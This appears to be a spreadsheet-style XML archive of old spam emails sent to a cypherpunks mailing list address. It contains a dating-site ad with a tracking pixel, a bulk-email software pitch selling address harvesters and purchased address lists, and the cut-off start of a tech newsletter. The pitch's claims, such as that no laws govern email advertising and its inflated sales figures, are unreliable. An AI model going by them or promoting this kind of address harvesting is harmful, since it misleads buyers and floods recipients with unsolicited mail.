             height=53 src="http://www.date.com/newsletter/image/ad_4.gif" width=183 border=0&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top align=middle width=186&gt;&lt;A 
             href="http://click.mm53.com/sp/t.pl?id=3275:7552100"&gt;&lt;IMG 
             height=13 src="http://www.date.com/newsletter/image/ad_3.gif" width=113 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
           &lt;TD width=328&gt;&lt;FONT size=-2&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD width=186&gt;&lt;FONT size=-2&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD vAlign=center align=middle width=700 colSpan=3&gt;&lt;A 
             href="http://click.mm53.com/sp/t.pl?id=3276:7552100"&gt;&lt;FONT 
             face="Arial Black, Arial" color=#ffffff size=7&gt;JOIN FOR 
             FREE&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;&lt;FONT face="Arial Black, Arial" color=#ffffff 
             size=6&gt;Find your soul mate today!&lt;/FONT&gt;&lt;BR&gt;&lt;FONT 
             face="Arial Black, Arial" color=#ffffff size=3&gt;BROWSE THROUGH 
             THOUSANDS OF PERSONALS IN YOUR OWN AREA.&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;
             &lt;TABLE cellSpacing=0 cellPadding=3 bgColor=#acacac background="" 
             border=0&gt;
               &lt;TBODY&gt;
               &lt;TR&gt;
                 &lt;TD vAlign=center align=middle width=330&gt;
                   &lt;TABLE width=330 bgColor=#ffffff background=""&gt;
                     &lt;TBODY&gt;
                     &lt;TR&gt;
                       &lt;TD vAlign=center align=middle&gt;&lt;A 
                         href="http://click.mm53.com/sp/t.pl?id=3277:7552100"&gt;&lt;FONT 
                         face="Arial Black, Arial" color=#c51418 size=6&gt;CLICK 
                         HERE&lt;/FONT&gt;&lt;BR&gt;&lt;FONT face="Arial Black, Arial" 
                         color=#c51418 size=5&gt;to Find Love Now!&lt;/FONT&gt;&lt;/A&gt; 
                     &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;IMG SRC="http://click.mm53.com/sp/t.pl?id=3278:7552100&amp;o=1" BORDER=0 WIDTH=0 HEIGHT=0&gt; &lt;BR&gt;&lt;P&gt;&lt;BR&gt;&lt;!-- 
 SKY-Email-Address: cypherpunks@einstein.ssz.com 
 SKY-Database: OnlyTheBest
 --&gt;
 &lt;A NAME='unsub'&gt;
 &lt;TABLE align=center border=1 cellpadding=5 cellspacing=0 bordercolor=gray&gt;
 &lt;TD&gt;&lt;TABLE width="600" align=center cellpadding="0" cellspacing="0" border="0" &gt;&lt;TR&gt;
 &lt;TD height=25&gt;&lt;FONT size="2" face="arial,sans-serif" color=gray&gt;Remove yourself from this recurring list by:&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;
 &lt;TD&gt;&lt;FONT color="gray" size="2" face="arial,sans-serif"&gt;&lt;A href="mailto:unsub-7552100-336@mm53.com"&gt;Clicking here&lt;/A&gt; to send a blank email to unsub-7552100-336@mm53.com&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;
 &lt;TD align="center"&gt;&lt;FONT size="2" face="arial,sans-serif"&gt;&lt;I&gt;OR&lt;/I&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;
 &lt;TD&gt;&lt;FONT face="arial,sans-serif" color="gray" size="2"&gt;Sending a postal mail to CustomerService, 427-3 Amherst Street, Suite 319, Nashua, NH 03063&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;
 &lt;TD align="CENTER"&gt;&lt;br&gt;&lt;FONT face="arial,sans-serif" size="2" color="black"&gt;&lt;I&gt;This message was sent to address cypherpunks@einstein.ssz.com&lt;/I&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TABLE&gt;
  &lt;/BODY&gt;&lt;/HTML&gt;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</si>
  <si>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Account Information
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=windows-1252"&gt;
 &lt;STYLE&gt;BODY {
 	FONT-FAMILY: "Arial"
 }
 TT {
 	FONT-FAMILY: "Courier New"
 }
 BLOCKQUOTE.CITE {
         PADDING-LEFT: 2.6em; MARGIN: 0px; BORDER-LEFT: 2px solid
 }
 SPAN.TABOOHEADER {
 	DISPLAY: none
 }
 &lt;/STYLE&gt;
 &lt;META content="MSHTML 6.00.2712.300" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY bgColor=#330099&gt;&lt;SPAN class=EUDORAHEADER&gt;&lt;BR&gt;&lt;/SPAN&gt;&lt;SPAN class=EUDORAHEADER&gt;
 &lt;P&gt;&amp;nbsp;&lt;/P&gt;
 &lt;TABLE borderColor=#000000 cellSpacing=0 cellPadding=0 width=500 align=center 
 bgColor=#ffffff border=3&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD bgColor=#ccccff&gt;
       &lt;DIV align=center&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD bgColor=#000000&gt;
             &lt;DIV align=center&gt;&lt;B&gt;&lt;FONT face="Arial, Helvetica, sans-serif"&gt;&lt;FONT 
             color=yellow size=5&gt;&lt;BR&gt; Email Advertise to 28,000,000 People for FREE
             &lt;BR&gt;&lt;/B&gt;&lt;FONT color=yellow size=3&gt;Act Now Before 6pm PST on Monday, May 20th&lt;BR&gt;
             and Receive a &lt;U&gt;&lt;B&gt;FREE $899.00 Bonus&lt;/U&gt;&lt;/B&gt;&lt;BR&gt;
             &lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;BR&gt;&lt;/DIV&gt;
       &lt;P align=left&gt;&lt;B&gt;&lt;FONT face="Arial, Helvetica, sans-serif"&gt;&lt;FONT 
       color=#CCFFFF size=2&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
       &lt;BLOCKQUOTE&gt;
         &lt;P&gt;&lt;FONT face="Arial, Helvetica, sans-serif" color=#000000 
         size=2&gt;&lt;BR&gt;
 1) Let's say you... Sell a $24.95 PRODUCT or SERVICE.&lt;BR&gt;
 2) Let's say you... Broadcast Email FREE to 500,000 PEOPLE DAILY.&lt;BR&gt;
 3) Let's say you... Receive JUST 1 ORDER for EVERY 2,500 EMAILS.&lt;BR&gt;
 &lt;BR&gt;
 CALCULATION OF YOUR EARNINGS BASED ON THE ABOVE STATISTICS:&lt;BR&gt;
 [Day 1]: $4,990  [Week 1]: $34,930  [Month 1]: $139,720&lt;BR&gt;
 &lt;BR&gt;
 ----- ---- --- -- -  -&lt;BR&gt;
 You now know why you receive so many email advertisements...&lt;BR&gt;
 ===&gt; BROADCAST EMAIL ADVERTISING IS EXTREMELY PROFITABLE!&lt;BR&gt;&lt;BR&gt;
 1) What if you... Sell a $99.95 PRODUCT or SERVICE?&lt;BR&gt;
 2) What if you... Broadcast Email to 30,000,000+ PEOPLE MONTHLY?&lt;BR&gt;
 3) What if you... Receive 1 ORDER for EVERY 250 EMAILS?&lt;BR&gt;&lt;BR&gt;
 Just IMAGINE =&gt; DAY 30! ==&gt; WEEK 30!! ===&gt; MONTH 30!!!&lt;BR&gt;&lt;BR&gt;
 ==&gt; The PROFITS that Broadcast Email CAN GENERATE are AMAZING!!&lt;BR&gt;&lt;BR&gt;
 ** According to Forrester Research, a Broadcast Email Ad is up&lt;BR&gt;
 ** to 15 TIMES MORE LIKELY to Result in a Sale than a Banner Ad!&lt;BR&gt;&lt;BR&gt;
 ----- ---- --- -- -  -&lt;BR&gt;
 [COMPARISON OF INTERNET ADVERTISING METHODS]:&lt;BR&gt;
 =========================================================&lt;BR&gt;
 =&gt; A 1/20 Page Targeted Web Site Banner Ad to 5 Million People&lt;BR&gt;
    on the Internet can cost you about $100,000.&lt;BR&gt;&lt;BR&gt;
 =&gt; A 5 Page Targeted Direct Mail Advertisement to 1 Million People&lt;BR&gt;
    through the Postal Service can cost you about $500,000.&lt;BR&gt;&lt;BR&gt;
 =&gt; A 50 Page Targeted HTML Broadcast Email Advertisement with&lt;BR&gt;
    Pictures to 50,000,000 People through the Internet is Free.&lt;BR&gt;&lt;BR&gt;
 ...Which advertising method sounds most appealing to you?&lt;BR&gt;&lt;BR&gt;
 =========================================================&lt;BR&gt;&lt;BR&gt;
 "Targeted direct email advertising is the wave of the future.&lt;BR&gt;
  By no other means can you effectively reach your market so&lt;BR&gt;
  quickly and inexpensively." - ONLINE PROFITS NEWSLETTER&lt;BR&gt;&lt;BR&gt;
 "Many business people are finding out that they can now advertise&lt;BR&gt;
  in ways that they never could have afforded in the past.  The&lt;BR&gt;
  cost of sending mass e-mail is extremely low, and the response&lt;BR&gt;
  rate is high and quick." - USA TODAY&lt;BR&gt;
 &lt;BR&gt;
 ---- --- -- -  -&lt;BR&gt;
 [EXAMPLE OF A PERSONALIZED/TARGETED BROADCAST EMAIL]:&lt;BR&gt;
 -------- ------- ------ ----- ---- --- -- -  -&lt;BR&gt;
 From: kate@cattiesinc.com&lt;BR&gt;
 To: mary@commtomm.com&lt;BR&gt;
 Subject: About Your Cat!&lt;BR&gt;&lt;BR&gt;
 Hi Mary,&lt;BR&gt;&lt;BR&gt;
 Are you interested in receiving up to 80% SAVINGS on CAT SUPPLIES?&lt;BR&gt;
 If so, come visit our web site at: http://www.cattiesinc.com&lt;BR&gt;&lt;BR&gt;
 =========================================================&lt;BR&gt;
 =&gt; With Broadcast Email Software, a Broadcast Email Advertisement&lt;BR&gt;
 =&gt; like this one can be AUTOMATICALLY sent to up to 1,000,000&lt;BR&gt;
 =&gt; PEOPLE on a DAILY BASIS with LESS than 2 MINUTES of YOUR TIME!&lt;BR&gt;&lt;BR&gt;
 * IMT Strategies Reports an AVERAGE of a 16.4% CLICK THROUGH RATE&lt;BR&gt;
   from users that have received a Broadcast Email Advertisement!&lt;BR&gt;&lt;BR&gt;
 ----- ---- --- -- -  -&lt;BR&gt;
 A EUROPEAN 2001 BENCHMARK STUDY&lt;BR&gt;
 Conducted by Forrester Research Says:&lt;BR&gt;&lt;BR&gt;
 1) 41% of Consumers Believe Email is a Good Way to Find out About&lt;BR&gt;
    New Products.&lt;BR&gt;&lt;BR&gt;
 2) 36% of Consumers in 13 Countries Read Most of the Promotional&lt;BR&gt;
    Email they Receive and 9% Forward the Email to a Friend Because&lt;BR&gt;
    They Think it is Valuable.&lt;BR&gt;&lt;BR&gt;
 ---- --- -- -  -&lt;BR&gt;
 BE PREPARED!  You may receive A HUGE AMOUNT of orders within&lt;BR&gt;
 minutes of sending out your first Broadcast Email Advertisement!&lt;BR&gt;&lt;BR&gt;
 * According to Digital Impact, 85% of Broadcast Email Offers are&lt;BR&gt;
   responded to within the FIRST 48 HOURS!&lt;BR&gt;&lt;BR&gt;
 "When you reach people with e-mail, they're in a work mode, even&lt;BR&gt;
  if they're not at work.  They're sitting up, they're alert.  You&lt;BR&gt;
  catch them at a good moment, and if you do it right, you have a&lt;BR&gt;
  really good shot of having them respond."&lt;BR&gt;
  - WILLIAM THAMES [Revnet Direct Marketing VP]&lt;BR&gt;&lt;BR&gt;
 ---- --- -- -  -&lt;BR&gt;
 * An Arthur Anderson Online Panel reveals that 85% of Online Users&lt;BR&gt;
   say that Broadcast Email Advertisements have LED TO A PURCHASE!"&lt;BR&gt;&lt;BR&gt;
 "According to FloNetwork, US Consumers DISCOVER New Products and&lt;BR&gt;
  Services 7+ TIMES MORE OFTEN through an Email Advertisement,&lt;BR&gt;
  than through Search Engines, Magazines and Television COMBINED!"&lt;BR&gt;&lt;BR&gt;
 Only a HANDFUL of Companies on the Internet have Discovered&lt;BR&gt;
 Broadcast Email Advertising... =&gt; NOW YOU CAN BE ONE OF THEM!!&lt;BR&gt;&lt;BR&gt;
 ---- --- -- -  -&lt;BR&gt;
 =&gt; United Messaging says there are 890+ MILLION EMAIL ADDRESSES!&lt;BR&gt;
 =&gt; GET READY!  Now with Broadcast Email, You Can Reach them ALL&lt;BR&gt;
 =&gt; Thanks to our Broadcast Email Software!&lt;BR&gt;&lt;BR&gt;
 Our Broadcast Email Software with DNS Technology Automatically&lt;BR&gt;
 Creates 10 SUPER-FAST MAIL SERVERS on Your COMPUTER which are&lt;BR&gt;
 then used to Send out Your Broadcast Emails to MILLIONS for FREE!&lt;BR&gt;&lt;BR&gt;
 ==&gt; With our NEW EMAIL SENDING TECHNOLOGY...&lt;BR&gt;
 ==&gt; Your Internet Provider's Mail Servers are NOT USED!&lt;BR&gt;&lt;BR&gt;
 There are NO Federal Regulations or Laws on Email Advertising &amp;&lt;BR&gt;
 Now with Our Software =&gt; You Can Avoid Internet Provider Concerns!&lt;BR&gt;&lt;BR&gt;
 =========================================================&lt;BR&gt;
 =&gt; If you send a Broadcast Email Advertisement to 50,000,000&lt;BR&gt;
 =&gt; People and Just 1 of 5,000 People Respond, You Can Generate&lt;BR&gt;
 =&gt; 10,000 EXTRA ORDERS!  How Much EXTRA PROFIT is this for You?&lt;BR&gt;
 =========================================================&lt;BR&gt;&lt;BR&gt;
 ------ ----- ---- --- -- -  -&lt;BR&gt;
 As Featured in: "The Boston Globe" (05/29/98),&lt;BR&gt;
 "The Press Democrat" (01/08/99), "Anvil Media" (01/29/98):&lt;BR&gt;
 =========================================================&lt;BR&gt;
 [NIM Corporation Presents]: THE BROADCAST EMAIL PACKAGE&lt;BR&gt;
 =========================================================&lt;BR&gt;
 REQUIREMENTS: WIN 95/98/2000/ME/NT/XP or MAC SoftWindows/VirtualPC&lt;BR&gt;&lt;BR&gt;
 &lt;U&gt;[BROADCAST EMAIL SENDER SOFTWARE] ($479.00 Retail):&lt;/U&gt;&lt;BR&gt;
     Our Broadcast Email Sender Software allows you the ability to&lt;BR&gt;
     send out Unlimited, Personalized and Targeted Broadcast Email&lt;BR&gt;
     Advertisements to OVER 500,000,000 People on the Internet at&lt;BR&gt;
     the rate of up to 1,000,000 DAILY, AUTOMATICALLY and for FREE!&lt;BR&gt;
     Have a List of Your Customer Email Addresses?  Broadcast Email&lt;BR&gt;
     Advertise to Them with our Software for FREE!&lt;BR&gt;&lt;BR&gt;
 &lt;U&gt;[TARGETED EMAIL EXTRACTOR SOFTWARE] ($299.00 Retail):&lt;/U&gt;&lt;BR&gt;
     Our Targeted Email Extractor Software will Automatically&lt;BR&gt;
     Navigate through the TOP 8 Search Engines, 50,000+ Newsgroups,&lt;BR&gt;
     Millions of Web Sites, Deja News, Etc.. and Collect MILLIONS&lt;BR&gt;
     of Targeted Email Addresses by using the keywords of your&lt;BR&gt;
     choice!  This is the ULTIMATE EXTRACTOR TOOL!&lt;BR&gt;&lt;BR&gt;
 &lt;U&gt;[15,000,000+ EMAIL ADDRESSES] ($495.00 Retail):&lt;/U&gt;&lt;BR&gt;
     MILLIONS of the NEWEST &amp; FRESHEST General Interest and&lt;BR&gt;
     Regionally Targeted Email Addresses Separated by Area Code,&lt;BR&gt;
     State, Province, and Country!  From Alabama to Wyoming,&lt;BR&gt;
     Argentina to Zimbabwe!  15,000,000+ FRESH EMAILS are YOURS!&lt;BR&gt;&lt;BR&gt;
 &lt;U&gt;[STEP BY STEP BROADCAST EMAIL PACKAGE INSTRUCTIONS]:&lt;/U&gt;&lt;BR&gt;
     You will be Guided through the Entire Process of Installing&lt;BR&gt;
     and Using our Broadcast Email Software to Send out Broadcast&lt;BR&gt;
     Email Advertisements, like this one, to MILLIONS of PEOPLE for&lt;BR&gt;
     FREE!  Even if you have NEVER used a computer before, these&lt;BR&gt;
     instructions make sending Broadcast Email as EASY AS 1-2-3!&lt;BR&gt;&lt;BR&gt;
 &lt;U&gt;[THE BROADCAST EMAIL HANDBOOK]:&lt;/U&gt;&lt;BR&gt;
     The Broadcast Email Handbook will describe to you in detail,&lt;BR&gt;
     everything you ever wanted to know about Broadcast Email!&lt;BR&gt;
     Learn how to write a SUCCESSFUL Advertisement, how to manage&lt;BR&gt;
     the HUNDREDS of NEW ORDERS you could start receiving, what&lt;BR&gt;
     sells BEST via Broadcast Email, etc...  This Handbook is a&lt;BR&gt;
     NECESSITY for ANYONE involved in Broadcast Email!&lt;BR&gt;&lt;BR&gt;
 &lt;U&gt;[UNLIMITED CUSTOMER &amp; TECHNICAL SUPPORT]:&lt;/U&gt;&lt;BR&gt;
     If you ever have ANY questions, problems or concerns with&lt;BR&gt;
     ANYTHING related to Broadcast Email, we include UNLIMITED&lt;BR&gt;
     Customer &amp; Technical Support to assist you!  Our #1 GOAL&lt;BR&gt;
     is CUSTOMER SATISFACTION!&lt;BR&gt;&lt;BR&gt;
 &lt;U&gt;[ADDITIONAL INFORMATION]:&lt;/U&gt;&lt;BR&gt;
     Our Broadcast Email Software Package contains so many&lt;BR&gt;
     features, that it would take five additional pages just to&lt;BR&gt;
     list them all!  Duplicate Removing, Automatic Personalization,&lt;BR&gt;
     and Free Upgrades are just a few of the additional bonuses&lt;BR&gt;
     included with our Broadcast Email Software Package!&lt;BR&gt;&lt;BR&gt;
 ------ ----- ---- --- -- -  -&lt;BR&gt;
 ALL TOGETHER our Broadcast Email Package contains EVERYTHING&lt;BR&gt;
 YOU WILL EVER NEED for Your Entire Broadcast Email Campaign!&lt;BR&gt;&lt;BR&gt;
 You Will Receive the ENTIRE Broadcast Email Package with&lt;BR&gt;
 EVERYTHING Listed Above ($1,250.00+ RETAIL) for ONLY $499.00 US!&lt;BR&gt;
 ========================================================&lt;BR&gt;
 BUT WAIT!!  If You Order by Monday, May 20th, You Will&lt;BR&gt;
 Receive the Broadcast Email Package for ONLY $295.00 US!!&lt;BR&gt;
 ========================================================&lt;BR&gt;
 Order NOW and Receive [13,000,000 BONUS EMAILS] ($899 VALUE)&lt;BR&gt;
 for FREE for a TOTAL of 28,000,000 FRESH EMAIL ADDRESSES!!&lt;BR&gt;
 ========================================================&lt;BR&gt;&lt;BR&gt;
 Regardless, if you send to 1,000 or 100,000,000 PEOPLE...&lt;BR&gt;&lt;BR&gt;
 You will NEVER encounter any additional charges ever again!&lt;BR&gt;
 Our Broadcast Email Software sends Email for a LIFETIME for FREE!&lt;BR&gt;&lt;BR&gt;
 ----- ---- --- -- -  -&lt;BR&gt;
 Since 1997, we have been the Broadcast Email Marketing Authority.&lt;BR&gt;
 Our #1 GOAL is to SEE YOU SUCCEED with Broadcast Email Advertising.&lt;BR&gt;&lt;BR&gt;
 We are so confident about our Broadcast Email Package, that we are&lt;BR&gt;
 giving you 30 DAYS to USE OUR ENTIRE PACKAGE FOR FREE!&lt;BR&gt;&lt;BR&gt;
 ==&gt; You can SEND Unlimited Broadcast Email Advertisements!&lt;BR&gt;
 ==&gt; You can EXTRACT Unlimited Targeted Email Addresses!&lt;BR&gt;
 ==&gt; You can RECEIVE Unlimited Orders!&lt;BR&gt;&lt;BR&gt;
 If you do not receive at least a 300% INCREASE in SALES or are not&lt;BR&gt;
 100% COMPLETELY SATISFIED with each and every single aspect of our&lt;BR&gt;
 Broadcast Email Package, simply return it to us within 30 DAYS for&lt;BR&gt;
 a 100% FULL REFUND, NO QUESTIONS ASKED!!&lt;BR&gt;&lt;BR&gt;
 Best of ALL, if you decide to keep our Broadcast Email Package, it&lt;BR&gt;
 can be used as a 100% TAX WRITE OFF for your Business!&lt;BR&gt;&lt;BR&gt;
 ---- --- -- - -&lt;BR&gt;
 See what users of our Broadcast Email Package have to say...&lt;BR&gt;
 =========================================================&lt;BR&gt;&lt;BR&gt;
 "Since using your program, I have made as much in two days as I&lt;BR&gt;
  had in the previous two weeks!!!!!  I have to say thank you for&lt;BR&gt;
  this program - you have turned a hobby into a serious money&lt;BR&gt;
  making concern."&lt;BR&gt;
  = W. ROGERS - Chicago, IL&lt;BR&gt;&lt;BR&gt;
 "We have used the software to send to all our members plus about&lt;BR&gt;
  100,000 off the disk you sent with the software and the response&lt;BR&gt;
  we have had is just FANTASTIC!!  Our visits and sales are nearly&lt;BR&gt;
  at an all time high!"&lt;BR&gt;
  = A. FREEMAN - England, UK&lt;BR&gt;&lt;BR&gt;
 "I have received over 1200 visitors today and that was only&lt;BR&gt;
  sending out to 10,000 email addresses!"&lt;BR&gt;
  = K. SWIFT - Gunnison, CO&lt;BR&gt;&lt;BR&gt;
 "I'm a happy customer of a few years now.  Thanks a lot....I love&lt;BR&gt;
  this program.."&lt;BR&gt;
  = S. GALLAGHER - Melville, NY&lt;BR&gt;&lt;BR&gt;
 "Thanks for your prompt filing of my order for your broadcast email&lt;BR&gt;
  software -- it took only about a day.  This is faster than ANYBODY&lt;BR&gt;
  I have ever ordered something from!  Thanks again!"&lt;BR&gt;
  = W. INGERSOLL - Scottsdale, AZ&lt;BR&gt;&lt;BR&gt;
 "I feel very good about referring the folks I have sent to you&lt;BR&gt;
  thus far and will continue to do so.  It is rare to find a company&lt;BR&gt;
  that does business this way anymore...it is greatly appreciated."&lt;BR&gt;
  = T. BLAKE - Phoenix, AZ&lt;BR&gt;&lt;BR&gt;
 "Your software is a wonderful tool! A++++"&lt;BR&gt;
  = S. NOVA - Los Angeles, CA&lt;BR&gt;&lt;BR&gt;
 "Thank you for providing such a fantastic product."&lt;BR&gt;
  = M. LOPEZ - Tucson, AZ&lt;BR&gt;&lt;BR&gt;
 "Your tech support is the best I have ever seen!"&lt;BR&gt;
  = G. GONZALEZ - Malibu, CA&lt;BR&gt;&lt;BR&gt;
 "I am truly impressed with the level of service.  I must admit I&lt;BR&gt;
  was a bit skeptical when reading your ad but you certainly deliver!"&lt;BR&gt;
  = I. BEAUDOIN - Toronto, ON&lt;BR&gt;&lt;BR&gt;
 "My first go round gave me $3000 to $4000 in business in less than&lt;BR&gt;
  one week so I must thank your company for getting me started."&lt;BR&gt;
  = A. ROBERTS - San Francisco, CA&lt;BR&gt;&lt;BR&gt;
 "We are really happy with your Email program.  It has increased&lt;BR&gt;
  our business by about 500%."&lt;BR&gt;
  = M. JONES - Vancouver, BC&lt;BR&gt;&lt;BR&gt;
 "IT REALLY WORKS!!!!!  Thank you thank you, thank you."&lt;BR&gt;
  = J. BECKLEY - Cupertino, CA&lt;BR&gt;&lt;BR&gt;
 ----- ---- --- -- -  -&lt;BR&gt;
 [SOUND TOO GOOD TO BE TRUE?]&lt;BR&gt;&lt;BR&gt;
 ** If you Broadcast Email to 500,000 Internet Users Daily...&lt;BR&gt;
 ** Do you think that maybe 1 of 5,000 may order?&lt;BR&gt;&lt;BR&gt;
 =&gt; If so... That is 100 EXTRA (COST-FREE) ORDERS EVERY DAY!!&lt;BR&gt;&lt;BR&gt;
 Remember.. You have 30 DAYS to use our Broadcast Email Package&lt;BR&gt;
 for FREE and SEE IF IT WORKS FOR YOU!&lt;BR&gt;&lt;BR&gt;
 If YOU are not 100% COMPLETELY SATISFIED, SIMPLY RETURN the&lt;BR&gt;
 Broadcast Email Package to us within 30 DAYS for a FULL REFUND!&lt;BR&gt;&lt;BR&gt;
 --- -- -  -&lt;BR&gt;
 [BROADCAST EMAIL SOFTWARE PACKAGE]: Easy Ordering Instructions&lt;BR&gt;
 =========================================================&lt;BR&gt;
 =&gt; Once your order is received we will IMMEDIATELY RUSH out the&lt;BR&gt;
 =&gt; Broadcast Email Package on CD-ROM to you via FEDEX PRIORITY&lt;BR&gt;
 =&gt; OVERNIGHT or 2-DAY PRIORITY INTERNATIONAL the SAME DAY FREE!&lt;BR&gt;&lt;BR&gt;
 ------- ------ ----- ---- --- -- -  -&lt;BR&gt;
 [TO ORDER BY PHONE]:&lt;BR&gt;
 To order our Broadcast Email Software Package by phone with&lt;BR&gt;
 a Credit Card or if you have any additional questions, please&lt;BR&gt;
 call our Sales Department in the USA at:&lt;BR&gt;&lt;BR&gt;
 =&gt; (541)665-0400&lt;BR&gt;&lt;BR&gt;
 ** YOU CAN ORDER NOW!  ALL Major Credit Cards are Accepted!&lt;BR&gt;&lt;BR&gt;
 ORDER by 3PM PST (M-TH) TODAY -&gt; Have it by 10am TOMORROW FREE!&lt;BR&gt;
 EUROPEAN &amp; FOREIGN Residents -&gt; Have it within 2 WEEKDAYS FREE!&lt;BR&gt;&lt;BR&gt;
 REMOVAL From Our Email List =&gt; CALL (206)208-4589&lt;BR&gt;&lt;BR&gt;
 ------- ------ ----- ---- --- -- -  -&lt;BR&gt;
 [TO ORDER BY FAX]:&lt;BR&gt;
 To order our Broadcast Email Software Package by fax with a Credit&lt;BR&gt;
 Card, please print out the order form at the bottom of this email&lt;BR&gt;
 and complete all necessary blanks.  Then, fax the completed order&lt;BR&gt;
 form to our Order Department in the USA at:&lt;BR&gt;&lt;BR&gt;
 =&gt; (503)213-6416&lt;BR&gt;&lt;BR&gt;
 ------- ------ ----- ---- --- -- -  -&lt;BR&gt;
 [TO ORDER BY POSTAL MAIL]:&lt;BR&gt;
 To order our Broadcast Email Software Package with a Cashiers&lt;BR&gt;
 Check, Credit Card, US Money Order, US Personal Check, or US Bank&lt;BR&gt;
 Draft by postal mail, please print out the order form at the&lt;BR&gt;
 bottom of this email and complete all necessary blanks.&lt;BR&gt;&lt;BR&gt;
 Send it along with payment of $295.00 US postmarked by Monday,&lt;BR&gt;
 May 20th, or $499.00 US after Monday, May 20th to:&lt;BR&gt;&lt;BR&gt;
 NIM Corporation&lt;BR&gt;
 1314-B Center Drive #514&lt;BR&gt;
 Medford,OR 97501&lt;BR&gt;
 United States of America&lt;BR&gt;&lt;BR&gt;
 ----- ---- --- -- -  -&lt;BR&gt;
 "OVER 20,000 BUSINESSES come on the Internet EVERY single day...&lt;BR&gt;
 If you don't send out Broadcast Email... YOUR COMPETITION WILL!"&lt;BR&gt;&lt;BR&gt;
 ------- ------ ----- ---- --- -- -  -&lt;BR&gt;
 [Broadcast Email Software Package]: ORDER FORM&lt;BR&gt;
 (c)1997-2002 NIM Corporation.  All Rights Reserved&lt;BR&gt;
 =========================================================&lt;BR&gt;&lt;BR&gt;
 Company Name: __________________________________________&lt;BR&gt;&lt;BR&gt;
 Your Name: ______________________________________________&lt;BR&gt;&lt;BR&gt;
 BILLING ADDRESS: ________________________________________&lt;BR&gt;&lt;BR&gt;
 City: ___________________ State/Province: _____________________&lt;BR&gt;&lt;BR&gt;
 Zip/Postal Code: __________ Country: __________________________&lt;BR&gt;&lt;BR&gt;
 NON POBOX SHIPPING ADDRESS: ____________________________&lt;BR&gt;&lt;BR&gt;
 City: ___________________ State/Province: _____________________&lt;BR&gt;&lt;BR&gt;
 Zip/Postal Code: __________ Country: __________________________&lt;BR&gt;&lt;BR&gt;
 Phone Number: ______________ Fax Number: ___________________&lt;BR&gt;&lt;BR&gt;
 Email Address: ____________________________________________&lt;BR&gt;&lt;BR&gt;
 ** To Purchase by Credit Card, Please Complete the Following:&lt;BR&gt;&lt;BR&gt;
 Visa [ ]  Mastercard [ ]  AmEx [ ]  Discover [ ]  Diners Club [ ]&lt;BR&gt;&lt;BR&gt;
 Name on Credit Card: _______________________________________&lt;BR&gt;&lt;BR&gt;
 CC Number: ____________________________ Exp. Date: _________&lt;BR&gt;&lt;BR&gt;
 Amount to Charge Credit Card ($295.00 or $499.00):  _______________&lt;BR&gt;&lt;BR&gt;
 Signature: ________________________________________________&lt;BR&gt;&lt;BR&gt;
 =========================================================&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/daily/20020710.html"&gt;
       http://www.lockergnome.com/issues/daily/20020710.html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&lt;/style&gt;&lt;title&gt;20020710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href="http://www.qksrv.net/click-471546-5032686"&gt;&lt;img src="http://www.qksrv.net/image-471546-5032686" width="468" height="60" alt="DDR Memory at Crucial.com" border="0"&gt;&lt;/a&gt;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07.10.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;WE NEED YOU TO BE AT GNOMEDEX!&lt;/b&gt; That's what your employer should be telling you. Microsoft Pocket PC experts will be sharing tips on improving workplace productivity with portable devices. Combined with Proxim's on location wireless networking solutions, the Pocket PC can keep you and your co-workers communicating no matter where you are in the building. Learn how to bring Wi-FI and PDA technologies together for the ultimate in portable computing. &lt;a href="http://www.gnomedex.com"&gt;Register for Gnomedex today&lt;/a&gt;!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 Last week, &lt;a href="http://www.axialis.com/"&gt;Axialis Software&lt;/a&gt;
 released IconWorkshop v5.0 - arguably the most powerful icon
 editor / manager for the Windows platform. Ever the icon addict, I
